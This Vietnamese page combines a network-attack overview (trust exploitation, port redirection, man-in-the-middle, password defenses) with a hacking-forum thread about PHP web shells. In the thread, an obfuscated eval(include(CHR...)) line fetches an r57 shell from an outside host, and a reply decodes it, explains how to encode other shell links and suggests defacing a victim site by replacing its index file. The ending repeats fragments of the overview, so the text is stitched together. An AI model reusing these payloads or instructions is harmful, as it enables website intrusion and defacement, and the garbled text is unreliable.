Hacker có thể làm thay đổi bảng định tuyến trong mạng. Điều đó sẽ làm chắc chắn rằng tất cả các gói tin sẽ được gởi đến hacker trước khi được gởi đến đích cuối cùng. Trong một vài trường hợp, hacker có thể giám sát tất cả các traffic, thật sự trở thành một man in the middle. Ta có thể hạn chế password attack bằng những cách sau: Không cho phép user dùng cùng password trên các hệ thống. Làm mất hiệu lực account sau một vài lần login không thành công. Bước kiểm tra này giúp ngăn chặn việc rà soát password nhiều lần. Không dùng passwords dạng clear text: dùng kỹ thuật OTP hoặc mã hoá password như đã trình bày phần trên. Dùng “strong” passwords: Dạng password này dùng ít nhất 8 ký tự, chứa các uppercase letters, lowercase letters, những con số và những ký tự đặc biệt. b) Trust exploitation: Đây là phương pháp “ khai thác tin cậy “, nó dựa vào các mối quan hệ tin cậy bên trong mạng. Bình thường, nếu hai domain có mối quan hệ tin cậy với nhau thì cho phép thiết bị domain này có thể access vào domain kia. Hacker sẽ lợi dụng sơ hở trong mối quan hệ tin cậy nhằm khai thác các sai sót trong mối quan hệ này để thoả hiệp, tức là để kiểm soát. Hệ thống bên ngoài firewall sẽ có mối quan hệ hoàn toàn không tin cậy với hệ thống bên trong firewall. c) Port redirection: Là một dạng khác của trust exploitation attack mà nó sử dụng một host thoả hiệp nhằm lấy giấy phép ra vào firewall. Ta có thể tượng như là một firewall với 3 interface và mỗi interface kết nối với 1 host. Host ở bên ngoài có thể hướng đến host ở public services ( thường được gọi là demilitanized zone- DMZ ). Và host ở public services có thể hướng tới cả host ở bên trong hay bên ngoài firewall.Hacker làm cho host ở public service trở thành 1 host thoả hiệp. Hacker đặt một phần mềm tại host này nhằm tạo ra một traffic trực tiếp từ host outside đến host inside. Kết nối này sẽ ko thực hiện thông qua firewall. Như vậy, host bên ngoài giành được quyền kết nối với host bên trong thông qua qui trình port redirection tại host trung tâm ( public services host ). d) Man in the middle attack: Kỹ thuật man in the middle được thực hịên bao gồm: Netword packet sniffers Giao thức routing và transport. Tấn công man in the middle nhằm mục đích: Đánh cắp dữ liệu Giành lấy một phiên giao dịch Phân tích traffic trong mạng DoS Phá hỏng dữ liệu được truyền Một ví dụ của man in the middle attack đó là: một người làm việc cho ISP và cố gắng access đến tất cả các gói dữ liệu vận chuyển giữa ISP và bất kỳ một mạng nào khác. Ta có thể ngăn chặn hình thức tấn công này bằng kỹ thuật mã hoá: mã hoá traffic trong một đường hầm IPSec, hacker sẽ chỉ nhìn thấy những thông tin không có giá trị. (vnpro.org) hung1910(HVA) Shell Tuttorial - Cơ bản đến nâng cao ! Hic, có thể các bác Mod sẽ del bài viết của em nhưng thật sự em đã tìm mỏi mắt trong Vniss+ rùi nhưng hum thấy 1 tut nào về Shell cả (có lẽ vì cái này quá đơn giản chăng - riêng đối với người mới như em thì chả có gì là đơn giản cả , search trong google cũng hum thấy, toàn mấy cái "Những hiểu biết cơ bản để trở thành hacker" về shell account - hacnho ). Em mới chỉ hình dung shell như là 1 backdoor, hình là 1 đoạn code php( ) cài vào data của web hacked để tạo "cổng sau" cho lần thâm nhập kế típ. 1. Trong box tut em thấy có shell r57, c99 nhưng sao lại có các commend với nội dung "con shell này của em" - tức là sao em hum hiểu, theo em nghĩ người share shell chỉ share với 1 code dạng công thức rùi tùy từng người chỉnh sửa mà tạo thành shell của riêng mình phải hum ạ ? 2. Giả sử em có 1 đoạn code php shell ý rùi phải up lên host hỗ trợ php (www.brinkster.com) để làm gì nhỉ ? 3. Em có down 1 tut trong Video hacking về hack IPB bằng tay thấy có 1 số hướng dẫn chuyển đoạn mã gì đó trong shell sang mã ASCII cũng hum hiểu lắm Code: exameval(include(CHR(104).CHR(116).CHR(116).CHR(112).CHR(58).CHR(47). CHR(47).CHR(114).CHR(101).CHR(107).CHR(99).CHR(111).CHR(114).CHR(4 6).CHR(105).CHR(110).CHR(102).CHR(111).CHR(47).CHR(114).CHR(53).CH R(55).CHR(46).CHR(116).CHR(120).CHR(116))); // Sao mấy số đứng trong () sau CHR của mỗi người lại khác nhau vậy ? Đoạn code em đưa ra ở trên đã đúng chưa, dấu "//" cách 1 khoảng với dấu ";" phải hum ? Sao em thực hành mà không được, em chưa hiểu lắm nhưng nghĩ chắc mấy cái số trong () phải có liên quan đến con shell "của em" phải hum ạ ? Mong các bác Mod có 1 tut về shell và mong mọi người đừng cười em Bác nào tốt bụng có thể chỉ em cách tạo 1 con "shell" hoàn chỉnh cho riêng em được hum ? Thank to all ! Trích: Hic, có thể các bác Mod sẽ del bài viết của em nhưng thật sự em đã tìm mỏi mắt trong Vniss+ rùi nhưng hum thấy 1 tut nào về Shell Những câu hỏi rõ ràng, đủ nghĩa, mang tính xây dựng thì ai del hả bạn ; Đúng là cũng chưa có một tut gọi là thảo luận chung về Shell cho mọi người hiểu, các bài viết nằm lẻ tẻ ở một số topic khác. Trích: riêng đối với người mới như em thì chả có gì là đơn giản cả Với tôi cũng thế, cùng newbie cả mà, chia xẻ cùng nhau học thôi Trích: search trong google cũng hum thấy, toàn mấy cái "Những hiểu biết cơ bản để trở thành hacker" về shell account - hacnho ) Thế search xong đọc chưa, hay chưa đọc cơ bản đã thích đi hack xem ra mấy câu hỏi cuối khác cơ bản đó. Trích: Em mới chỉ hình dung shell như là 1 backdoor, hình là 1 đoạn code php( ) cài vào data của web hacked để tạo "cổng sau" cho lần thâm nhập kế típ. Uh thì nói chung cũng không đến mức to tát quá đâu . Đề nghị bạn tham khảo thêm topic này : Shell ASP có vào được DB không? để có những cái nhìn đầu tiên; Chú ý là để sử dụng được hiệu quả Shell thì bản thân bạn cần biết nhiều các kiến thức khác, các kiến thức cơ bản đó. Ví dụ lệnh của hệ điều hành, các câu lệnh SQL .v.v. ================ Trích: 1. Trong box tut em thấy có shell r57, c99 nhưng sao lại có các commend với nội dung "con shell này của em" - tức là sao em hum hiểu, theo em nghĩ người share shell chỉ share với 1 code dạng công thức rùi tùy từng người chỉnh sửa mà tạo thành shell của riêng mình phải hum ạ ? Ý người ta mún nói là em up shell thành công rồi đó, link đây này anh em cứ dùng đó mà chiến (Đồng ý có những người cũng edit lại shell gốc một tí cho sành điệu ấy mà); Người ta share là share đàng hoàng mừ, công thức gì đâu bạn, đó là hẳn một con shell mà cứ việc dùng thôi (Include .v.v.) chả phải sửa sang chi. ================ Trích: 2. Giả sử em có 1 đoạn code php shell ý rùi phải up lên host hỗ trợ php (www.brinkster.com) để làm gì nhỉ ? Câu này thì tôi chưa hiểu là bạn Up được shell lên host của victim hay host của bạn. Nếu up được lên host của victim thì chiến đi chứ còn làm gì ; đơn giản nhất là del cái file index đi, up cái file index của mình lên -> deface luôn. Nhưng thôi nói vậy thôi không khuyến cáo việc phá hoại các site có ích. Có thì cứ để ở đó mà thực hành. Nếu host của bạn à, làm cách nào để chiến được root thì tốt quá nghen , còn nếu không thì cứ để đó cho mục đích khác như include chẳng hạn ================= Trích: 3. Em có down 1 tut trong Video hacking về hack IPB bằng tay thấy có 1 số hướng dẫn chuyển đoạn mã gì đó trong shell sang mã ASCII cũng hum hiểu lắm Hừ cái tật chả học cơ bản chi, chả học PHP nên nó bảo sao thì nghe vậy chả biết phát triển, chả hiểu gốc nó là cái chi. Dấu ; ở cuối câu lệnh đó báo cho trình thông dịch kịch bản biết là kết thúc một câu lệnh của PHP; Đó thuộc về cú pháp của PHP Cụm kí hiệu // (liền nhau) là cách chú thích (các chú giải, giải thích của lập trình viên) về một đoạn mã nào đó. Nó ko có tác dụng thực hiện lệnh. Nói cách khác trong câu lệnh trên cái dấu // chả có tích sự gì cả. Nếu thêm mấy từ sau cái dấu // đó thì cũng chả sao; ví dụ (viết liền trên dòng đó ko được xuống dòng) //Nhớ lắm em ơi Mấy cái này cơ bản quá mà, vào topic PHP ở Box Training Room mà đọc chr(int ASCII_CODE) là hàm chuyển đổi mã ASCII của kí tự ra kí tự ấy mà. Cần thạo mã ASCII của các chữ, nếu ko thạo thì vô google mà tra. Ví như mã ASCII của kí tự A là 65 thì như vậy chr(65) == "A"; thế thôi Dấu . là toán tử "cộng" sâu. Vậy dịch nôm na cái đoạn Code: CHR(104).CHR(116).CHR(116).CHR(112).CHR(58).CHR(47).CHR(47).CHR(11 4).CHR(101).CHR(107).CHR(99).CHR(111).CHR(114).CHR(46).CHR(105).CH R(110).CHR(102).CHR(111).CHR(47).CHR(114).CHR(53).CHR(55).CHR(46).C HR(116).CHR(120).CHR(116) là tạo ra sâu : http://rekcor.info/r57.txt -> ơ của cu Rek à đây là link shell để include ấy mà ; nếu có link khác thì you cứ theo đó mà mã hóa thôi Ở đây 104 là mã ASCII kí tự h, 116 ;à t, 112 là p, 58 là dấu :, 47 là dấu / đó cứ thế mà dịch nếu you có link khác thì cũng dựa theo đó mà dịch Trích: Sao mấy số đứng trong () sau CHR của mỗi người lại khác nhau vậy ? Đoạn code em đưa ra ở trên đã đúng chưa, dấu "//" cách 1 khoảng với dấu ";" phải hum ? Sao em thực hành mà không được, em chưa hiểu lắm nhưng nghĩ chắc mấy cái số trong () phải có liên quan đến con shell "của em" phải hum ạ ? . Hacker có thể làm thay đổi bảng định tuyến trong mạng. Điều đó sẽ làm chắc chắn rằng tất cả các gói tin sẽ được gởi đến hacker trước khi được gởi đến đích. services có thể hướng tới cả host ở bên trong hay bên ngoài firewall .Hacker làm cho host ở public service trở thành 1 host thoả hiệp. Hacker đặt một phần mềm tại host này nhằm tạo ra một traffic trực. có mối quan hệ tin cậy với nhau thì cho phép thiết bị domain này có thể access vào domain kia. Hacker sẽ lợi dụng sơ hở trong mối quan hệ tin cậy nhằm khai thác các sai sót trong mối quan hệ